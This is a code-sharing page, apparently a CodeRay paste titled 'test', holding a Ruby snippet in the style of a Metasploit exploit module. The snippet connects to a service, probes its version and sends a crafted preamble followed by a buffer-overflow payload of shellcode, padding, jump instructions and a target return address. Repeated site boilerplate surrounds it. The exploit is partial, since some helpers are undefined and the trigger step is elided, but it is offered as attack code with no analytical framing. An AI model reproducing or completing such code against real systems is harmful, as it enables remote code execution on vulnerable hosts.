test

Ruby code posted by test
created at 26 Jul 23:38, updated at 29 Jul 01:13

def exploit
  connect()
  preamble = "\x00\x4d\x00\x03\x00\x01"
  version = probe_ver()
  if version == 5
    payload = prep_ark5()
  else
    payload = prep_ark4()
  end
  preamble << payload.length
  sock.put(preamble) # Required by protocol
  sock.get_once()
  sock.put(payload) # Send attack payload
  sock.get_once()
  ... # vulnerability triggered
end
def prep_ark5()
  payload = shellcode()
  payload << rand_alpha(1167 - payload.length)
  payload << "\xe98" + [-1172].pack("V")
  payload << "\xeb\xf9"
  payload << get_target_ret(5) # Tar_Ver: 5
  payload << rand_alpha(4096 - payload.length)
  return payload
end

645 Bytes in 2 ms with coderay

Try it!

paste to highlight

Download

Source | Bugtracker

Documentation

in autumnal colors

Old website

test

Ruby code posted by test
created at 26 Jul 23:38, updated at 29 Jul 01:13

Try it!

paste to highlight

Download

Source | Bugtracker

Documentation

in autumnal colors

Old website

test

Ruby code posted by test created at 26 Jul 23:38, updated at 29 Jul 01:13

Ruby code posted by test
created at 26 Jul 23:38, updated at 29 Jul 01:13